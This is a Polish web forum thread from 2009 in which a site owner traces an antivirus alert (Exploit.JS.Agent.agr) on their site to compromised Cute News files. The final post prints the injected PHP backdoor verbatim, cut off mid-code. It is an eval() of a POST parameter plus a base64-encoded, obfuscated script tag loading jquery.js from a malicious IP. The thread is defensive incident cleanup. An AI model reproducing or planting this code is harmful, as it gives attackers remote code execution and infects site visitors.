Trojan: Exploit.JS.Agent.agr na stronie/już skanowałem kompa

No więc, wchodząc na stronę www.kate-ryan.pl Kaspersky zaczął krzyczeć! Zablokował: Trojana: Exploit.JS.Agent.agr / http://94.247.2.195/jquery.js. Szukałem dziwnych kodów na stronie, plików. No i skanowałem cały system. Nic nie mogłem znaleźć. Dziwne jest to, że innym (korzystającym z Avast’a) nic nie wykrywa :confused:

Mam nadzieję, że wspólnie znajdziemy jakieś rozwiązanie.

Wpisz te adresy tutaj i zobacz

http://www.unmaskparasites.com/

Jeśli korzystasz z Firefox’a doinstaluj wtyczkę WOT i też będziesz wiedzieć.

Hmmm… to jest bardzo, bardzo dziwne. Nic nie wykryło:

- www.mtv.co.uk safe? - displaying 1 of 1

Sprawdzałem też tutaj 94.247.2.195 i nie wygląda ciekawie, lepiej nie klikać.

Zablokowałem stronę. Ale… coś trzeba zrobić. Nie wiem gdzie to jest. A usunięcie całego serwisu nie wchodzi w grę :confused:

Zobacz też tą stronę

http://www.searchengines.pl/index.php?s … pic=124457

Po szukaniu sprawcy: doszedłem do tego, ze altert wywoływany jest poprzez includowanie systemu newsów Cute News. Po usunięciu strona działa normalnie, ale po wejściu w galerię, znowu to się dzieje. Szukałem w folderze (gdzie jest zainstalowany system) różnych tagów: http://; iframe; hxxp. Co jeszcze mogę zrobić?

Dodane 24.04.2009 (Pt) 17:04

Problem znaleziony: do każdego pliku cutenews został dopisany kod:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdlcFMlM0NzY3d0cnYyaWlwdCUyMHd0c3JLcXpjdjJpJTNEcGslMkYlMkY5Z1RNNGdUTSUyRWVwUzI0N3d0JTJFWTZTMiUyRVk2UzFab1M5djJpNSUyRmpxdWVyeSUyRWpzcGslM0UlM0N2MmklMkZab1NzZXBTY3Jpd3RwZXBTdHBrJTNFJykucmVwbGFjZSgvd3R8Wm9TfGVwU3x3bWJ8WTZTfEtxenxwa3xnVE18djJpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('##','',$s);if(stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i